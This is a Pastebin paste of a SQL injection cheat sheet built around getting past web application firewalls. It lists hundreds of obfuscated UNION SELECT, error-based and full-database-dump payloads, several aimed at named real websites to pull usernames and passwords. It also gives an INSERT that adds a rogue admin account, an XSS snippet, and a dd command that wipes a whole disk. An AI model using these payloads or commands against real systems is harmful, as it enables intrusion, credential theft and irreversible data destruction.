API tools faq
paste
Advertisement
zurael_sTz

bypass waf

zurael_sTz
Dec 30th, 2016
720
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 29.69 KB | None | 0 0
raw download clone embed print report
  1. https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF
  2. String Injection method
  3.  
  4. --'- : +--+ / : -- - : --+- : /*
  5. ) order by 1-- -
  6.  
  7.  
  8. ') order by 1-- -
  9.  
  10. ')order by 1%23%23
  11.  
  12. %')order by 1%23%23
  13.  
  14. Null' order by 100--+
  15.  
  16. Null' order by 9999--+
  17.  
  18. ')group by 99-- -
  19.  
  20. 'group by 119449-- -
  21.  
  22. group by 14;%00
  23.  
  24. 'group/**/by/**/99%23%23
  25.  
  26. ?id=-11%0Aunion%0Aselect 1,2,3,4
  27.  
  28. union select ByPassing method
  29.  
  30. +union+distinct+select+
  31.  
  32. +union+distinctROW+select+
  33.  
  34. /**//*!12345UNION SELECT*//**/
  35.  
  36. /**//*!50000UNION SELECT*//**/
  37.  
  38. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  39.  
  40. +/*!u%6eion*/+/*!se%6cect*/+
  41.  
  42. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  43.  
  44. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  45.  
  46. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  47.  
  48. union /*!50000%53elect*/
  49.  
  50. %55nion %53elect
  51.  
  52. +--+Union+--+Select+--+
  53.  
  54. +UnIoN/*&a=*/SeLeCT/*&a=*/
  55.  
  56. id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
  57.  
  58. id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
  59.  
  60. UnIoN SeLeCt CoNcAt(version())--
  61.  
  62. uNiOn aLl sElEcT
  63.  
  64. uUNIONnion all sSELECTelect
  65.  
  66. /*!%55NiOn*/ /*!%53eLEct*/
  67.  
  68. %55nion(%53elect 1,2,3)-- -
  69.  
  70. +union+distinct+select+
  71.  
  72. +union+distinctROW+select+
  73.  
  74. /**//*!12345UNION SELECT*//**/
  75.  
  76. /**//*!50000UNION SELECT*//**/
  77.  
  78. /**/UNION/**//*!50000SELECT*//**/
  79.  
  80. /*!50000UniON SeLeCt*/
  81.  
  82. union /*!50000%53elect*/
  83.  
  84. +#uNiOn+#sEleCt
  85.  
  86. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  87.  
  88. /*!%55NiOn*/ /*!%53eLEct*/
  89.  
  90. /*!u%6eion*/ /*!se%6cect*/
  91.  
  92. +un/**/ion+se/**/lect
  93.  
  94. uni%0bon+se%0blect
  95.  
  96. %2f**%2funion%2f**%2fselect
  97.  
  98. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  99.  
  100. REVERSE(noinu)+REVERSE(tceles)
  101.  
  102. /*--*/union/*--*/select/*--*/
  103.  
  104. union (/*!/**/ SeleCT */ 1,2,3)
  105.  
  106. /*!union*/+/*!select*/
  107.  
  108. union+/*!select*/
  109.  
  110. /**/union/**/select/**/
  111.  
  112. /**/uNIon/**/sEleCt/**/
  113.  
  114. /**//*!union*//**//*!select*//**/
  115.  
  116. /*!uNIOn*/ /*!SelECt*/
  117.  
  118. +union+distinct+select+
  119.  
  120. +union+distinctROW+select+
  121.  
  122. +UnIOn%0d%0aSeleCt%0d%0a
  123.  
  124. UNION/*&test=1*/SELECT/*&pwn=2*/
  125.  
  126. un?+un/**/ion+se/**/lect+
  127.  
  128. +UNunionION+SEselectLECT+
  129.  
  130. +uni%0bon+se%0blect+
  131.  
  132. %252f%252a*/union%252f%252a /select%252f%252a*/
  133.  
  134. /%2A%2A/union/%2A%2A/select/%2A%2A/
  135.  
  136. %2f**%2funion%2f**%2fselect%2f**%2f
  137.  
  138. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  139.  
  140. /*!UnIoN*/SeLecT+
  141. Union Select by PASS with Url Encoded Method:
  142. %55nion(%53elect)
  143.  
  144. union%20distinct%20select
  145.  
  146. union%20%64istinctRO%57%20select
  147.  
  148. union%2053elect
  149.  
  150. %23?%0auion%20?%23?%0aselect
  151.  
  152. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  153.  
  154. %55nion %53eLEct
  155.  
  156. u%6eion se%6cect
  157.  
  158. unio%6e %73elect
  159.  
  160. unio%6e%20%64istinc%74%20%73elect
  161.  
  162. uni%6fn distinct%52OW s%65lect
  163.  
  164. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
  165.  
  166. and(0)union%23xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  167. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx%0aselect
  168.  
  169. %55nion(%53elect)
  170. union%20distinct%20select
  171. union%20%64istinctRO%57%20select
  172. union%2053elect
  173. %23?%0auion%20?%23?%0aselect
  174. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  175. %55nion %53eLEct
  176. u%6eion se%6cect
  177. unio%6e %73elect
  178. unio%6e%20%64istinc%74%20%73elect
  179. uni%6fn distinct%52OW s%65lect
  180. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%74
  181.  
  182. ===================================================================================================================================
  183. :: Buffer Overflow ::
  184. ===================================================================================================================================
  185. +And(select 1)=(select 0×414)+union+select+1–
  186.  
  187. +And(select 1)=(select 0xAAAA)+union+select+1–
  188.  
  189. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+
  190.  
  191. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  192.  
  193. ==================================================================================================================================
  194. :: 400 Bad Request ::
  195. ==================================================================================================================================
  196. –+%0A
  197.  
  198. union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
  199.  
  200. ==================================================================================================================================
  201. null the parameter
  202. ==================================================================================================================================
  203. id=-1
  204.  
  205. id=null
  206.  
  207. id=1+and+false+
  208.  
  209. id=9999
  210.  
  211. id=1 and 0
  212.  
  213. id==1
  214.  
  215. id=(-1)
  216.  
  217. =======================================================================================================================================
  218. Group_Concat
  219. =======================================================================================================================================
  220. Group_Concat
  221.  
  222. group_concat()
  223.  
  224. /*!group_concat*/()
  225.  
  226. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  227.  
  228. group_concat(,0x3c62723e)
  229.  
  230. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  231.  
  232. CoNcAt()
  233.  
  234. CONCAT(DISTINCT Version())
  235.  
  236. concat(,0x3a,)
  237.  
  238. concat%00()
  239.  
  240. %00CoNcAt()
  241.  
  242. /*!50000cOnCat*/(/*!Version()*/)
  243.  
  244. /*!50000cOnCat*/
  245.  
  246. /**//*!12345cOnCat*/(,0x3a,)
  247.  
  248. concat_ws()
  249.  
  250. concat(0x3a,,0x3c62723e)
  251.  
  252. /*!concat_ws(0x3a,)*/
  253.  
  254. concat_ws(0x3a3a3a,version()
  255.  
  256. CONCAT_WS(CHAR(32,58,32),version(),)
  257.  
  258. REVERSE(tacnoc)
  259.  
  260. binary(version())
  261.  
  262. uncompress(compress(version()))
  263.  
  264. aes_decrypt(aes_encrypt(version(),1),1)
  265.  
  266. ====================================================================================================================================
  267. To appear column numbr in page put after id
  268. ====================================================================================================================================
  269. id=1+and+1=0+union+select+1,2,3,4,5,6
  270.  
  271. +AND+1=0
  272.  
  273. /*!aND*/ 1 like 0
  274.  
  275. +/*!and*/+1=0
  276.  
  277. +and+2>3+
  278.  
  279. +and(1)=(0)
  280.  
  281. and (1)!=(0)
  282.  
  283. +div+0
  284.  
  285. Having+1=0
  286.  
  287. ===================================================================================================================================
  288. function ByPassing
  289. ===================================================================================================================================
  290. unhex(hex(value))
  291.  
  292. cast(value as char)
  293.  
  294. uncompress(compress(version()))
  295.  
  296. cast(version() as char)
  297.  
  298. aes_decrypt(aes_encrypt(version(),1),1)
  299.  
  300. binary(version())
  301.  
  302. convert(value using ascii)
  303.  
  304. ===================================================================================================================================
  305. avoid source page injection
  306. ===================================================================================================================================
  307. concat(?”>,<br><br><br>,@@version,?<img src=”,?<?’#)
  308.  
  309. “><br>? <img src=”
  310.  
  311. <img src=””/>injection<img src=”
  312.  
  313. concat(0x223e,@@version)
  314.  
  315. concat(0x273e27,version(),0x3c212d2d)
  316.  
  317. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  318.  
  319. concat(0x223e,@@version,0x3c696d67207372633d22)
  320.  
  321. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
  322.  
  323. concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
  324.  
  325. concat(‘</title>’,@@version,’<title>’)
  326.  
  327. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  328.  
  329. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  330.  
  331. ===================================================================================================================================
  332. get version – DB_NAME – user – HOST_NAME – datadir
  333. ===================================================================================================================================
  334. version()
  335.  
  336. convert(version() using latin1)
  337.  
  338. unhex(hex(version()))
  339.  
  340. @@GLOBAL.VERSION
  341.  
  342. (substr(@@version,1,1)=5) :: 1 true 0 fals
  343.  
  344. # like #
  345.  
  346. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
  347.  
  348. ==================================================================================================================================
  349. +and substring(version(),1,1)=4
  350.  
  351. +and substring(version(),1,1)=5
  352.  
  353. +and substring(version(),1,1)=9
  354.  
  355. +and substring(version(),1,1)=10
  356.  
  357. id=1 /*!50094aaaa*/ error
  358.  
  359. id=1 /*!50095aaaa*/ no error
  360.  
  361. id=1 /*!50096aaaa*/ error
  362.  
  363. # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  364.  
  365. id=1 /*!40123 1=1*/–+- no error
  366.  
  367. id=1 /*!40122rrrr*/ no error
  368.  
  369. # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  370. =================================================================================================================================
  371. DB_NAME()
  372. =================================================================================================================================
  373. @@database
  374. database()
  375. id=vv()
  376. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
  377. http://www.marinaplast.com/page.php?id=vv()
  378. @@user
  379. user()
  380. user_name()
  381. system_user()
  382. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –
  383.  
  384. HOST_NAME()
  385. @@hostname
  386. @@servername
  387. SERVERPROPERTY()
  388.  
  389. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
  390. @@datadir
  391. datadir()
  392. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
  393. ASPX
  394. and 1=0/@@version
  395. ‘ and 1=0/@@version;–
  396. ‘) and 1=@@version–
  397. and 1=0/user;–
  398.  
  399. Requested method
  400. [DUMP DB in 1 Request]
  401.  
  402. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  403.  
  404. (select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  405. ===================================================================================================================================
  406. [DUMP DB in 1 Request improve]
  407. ===================================================================================================================================
  408.  
  409. (select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  410.  
  411. like
  412. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –
  413. ===================================================================================================================================
  414. #2#
  415. ===================================================================================================================================
  416. method like DUMP DB in 1 Request
  417. ===================================================================================================================================
  418. concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  419. like
  420. http://www.mishnetorah.com/shop/details.php?id=-26+union+select+1,2,3,concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  421. ===================================================================================================================================
  422. #3#
  423. ===================================================================================================================================
  424. databases
  425.  
  426. (select+count(schema_name) +from+information_schema.schemata)
  427.  
  428. # like #
  429. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –
  430.  
  431. tables
  432. (select+count(table_name) +from+information_schema.tables)
  433. # like #
  434. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –
  435.  
  436. columns
  437. (select+count(column_name) +from+information_schema.columns)
  438. # like #
  439. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
  440. ===================================================================================================================================
  441. #4#
  442. ===================================================================================================================================
  443. show the table with all her columns
  444.  
  445. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  446.  
  447. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+
  448.  
  449. like
  450. http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
  451. ===================================================================================================================================
  452. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  453. ===================================================================================================================================
  454. feltered requested
  455.  
  456. # tables #
  457. group_concat(/*!table_name*/)
  458.  
  459. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  460.  
  461. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  462.  
  463. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
  464. ===================================================================================================================================
  465. # columns #
  466. ===================================================================================================================================
  467. group_concat(/*!column_name*/)
  468.  
  469. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  470.  
  471. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  472.  
  473. /*!froM*/ table– -
  474. ===================================================================================================================================
  475. #6#
  476. ===================================================================================================================================
  477. bypass method
  478.  
  479. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  480.  
  481. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  482.  
  483. like
  484. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 –
  485. ===================================================================================================================================
  486. #7#
  487. ===================================================================================================================================
  488. bypass method
  489.  
  490. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  491.  
  492. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  493.  
  494. like
  495. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–
  496.  
  497. ===================================================================================================================================
  498. [+] Union Select:
  499. ===================================================================================================================================
  500. union /*!select*/+
  501. union/**/select/**/
  502. /**/union/**/select/**/
  503. /**/union/*!50000select*/
  504. /**//*!12345UNION SELECT*//**/
  505. /**//*!50000UNION SELECT*//**/
  506. /**/uniUNIONon/**/selSELECTect/**/
  507. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  508. /**//*!union*//**//*!select*//**/
  509. /**/UNunionION/**/SELselectECT/**/
  510. /**//*UnIOn*//**//*SEleCt*//**/
  511. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  512. /**/UNunionION/**/all/**/SELselectECT/**/
  513. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  514. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  515. uni<on all sel<ect
  516. %20union%20/*!select*/%20
  517. union%23aa%0Aselect
  518. union+distinct+select+
  519. union+distinctROW+select+
  520. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  521. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  522. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  523. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  524. /*!u%6eion*/+/*!se%6cect*/+
  525. 1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  526. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  527. union /*!50000%53elect*/
  528. +%2F**/+Union/*!select*/
  529. %55nion %53elect
  530. +–+Union+–+Select+–+
  531. +UnIoN/*&a=*/SeLeCT/*&a=*/
  532. uNiOn aLl sElEcT
  533. uUNIONnion all sSELECTelect
  534. union(select(1),2,3)
  535. union (select 1111,2222,3333)
  536. union (/*!/**/ SeleCT */ 11)
  537. %0A%09UNION%0CSELECT%10NULL%
  538. /*!union*//*–*//*!all*//*–*//*!select*/
  539. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  540. union+sel%0bect
  541. +uni*on+sel*ect+
  542. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  543. union(select (1),(2),(3),(4),(5))
  544. UNION(SELECT(column)FROM(table))
  545. id=1+’UnI”On’+’SeL”ECT’ <-MySQL only
  546. id=1+’UnI’||’on’+SeLeCT’ <-MSSQL only
  547. union select 1–+%0A,2–+%0A,3–+%0A etc ….
  548. ===================================================================================================================================
  549. [+] Buffer overflow:
  550. ===================================================================================================================================
  551. +And(select 1)=(select 0×414)+union+select+1–
  552. +And(select 1)=(select 0xAAAA)+union+select+1–
  553. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  554. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  555. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141414141414141414?141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+
  556. ===================================================================================================================================
  557. [+] Group Concat:
  558. ===================================================================================================================================
  559. Group_Concat
  560. group_concat()
  561. /*!group_concat*/()
  562. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  563. group_concat(,0x3c62723e)
  564. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  565. CoNcAt()
  566. CONCAT(DISTINCT Version())
  567. concat(,0x3a,)
  568. concat%00()
  569. %00CoNcAt()
  570. /*!50000cOnCat*/(/*!Version()*/)
  571. /*!50000cOnCat*/
  572. /**//*!12345cOnCat*/(,0x3a,)
  573. concat_ws()
  574. concat(0x3a,,0x3c62723e)
  575. /*!concat_ws(0x3a,)*/
  576. concat_ws(0x3a3a3a,version()
  577. CONCAT_WS(CHAR(32,58,32),version(),)
  578. ===================================================================================================================================
  579. ERORE BASED
  580. ===================================================================================================================================
  581. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–
  582.  
  583. Database
  584.  
  585. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  586.  
  587. Table_name
  588.  
  589. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  590.  
  591. Columns
  592.  
  593. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  594.  
  595. extract date
  596.  
  597. http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  598.  
  599. Notice the limit function in the query
  600. A website can have more than 2 two databases, so increase the limit until you find all database names
  601. Example: limit 0,1 or limit 1,1 or limit 2,1
  602. ===================================================================================================================================
  603. Differences:
  604. Error Based Query for Database Extraction:
  605. ===================================================================================================================================
  606. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  607.  
  608. Double Query for Database Extraction:
  609.  
  610. and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  611. information_schema.tables group by x)a) and 1=1
  612.  
  613. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  614. concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  615. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  616.  
  617. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  618. concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
  619. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  620. information_schema.tables group by x)a) and 1
  621. ===================================================================================================================================
  622. WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  623. ===================================================================================================================================
  624.  
  625. Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.
  626. Code: dd if=/dev/urandom of=/dev/sda bs=1M
  627.  
  628. I’d say using concat(0xY)
  629.  
  630. Y being ‘<script>alert(‘Text here’);</script>’ in hex
  631. union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)
  632.  
  633. http://zerocoolhf.altervista.org/level2.php?id=-1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20version%28%29%29b%20join%20%28select%20database%28%29%29c%29–+
  634.  
  635. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)
  636.  
  637. =113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–
  638.  
  639. injection in sql database addd new user
  640. INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’)
  641.  
  642. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  643.  
  644. CHALLENGES
  645.  
  646. Code:
  647. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0×7365637572697479))–+-
  648. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
  649. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–
  650. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -
  651. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-
  652. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  653. null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x
  654. ===================================================================================================================================
  655. Error Based:
  656. ===================================================================================================================================
  657. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  658.  
  659. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  660.  
  661. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -
  662. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -
  663.  
  664. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  665.  
  666. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  667.  
  668. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x
  669.  
  670. or 1=convert(int,(@@version))-
  671. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  672. +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  673.  
  674. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-
  675. ===================================================================================================================================
  676. WAF BYPASS BY TOTTI
  677. ===================================================================================================================================
  678.  
  679. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())– -
  680.  
  681. =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()– -
  682.  
  683. ===================================================================================================================================
  684. WUBI – 1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4–
  685.  
  686. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  687. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  688.  
  689. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  690. ===================================================================================================================================
  691.  
  692. +and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))
  693. ===================================================================================================================================
  694.  
  695. http://zerofreak.blogspot.it/2012/02/tutorial-by-zer0freak-zer0freak-sqli.html
  696.  
  697. http://www.websec.ca/kb/sql_injection
  698.  
  699. http://www.hellboundhackers.org/articles/862-mysql-injection-complete-tutorial.html
  700.  
  701. ===================================================================================================================================
  702. test
  703.  
  704. http://www.mt.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  705.  
  706. …………………………………..
  707. http://www.mt.ro/nou/articol.php?id=-angajari’ and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
  708.  
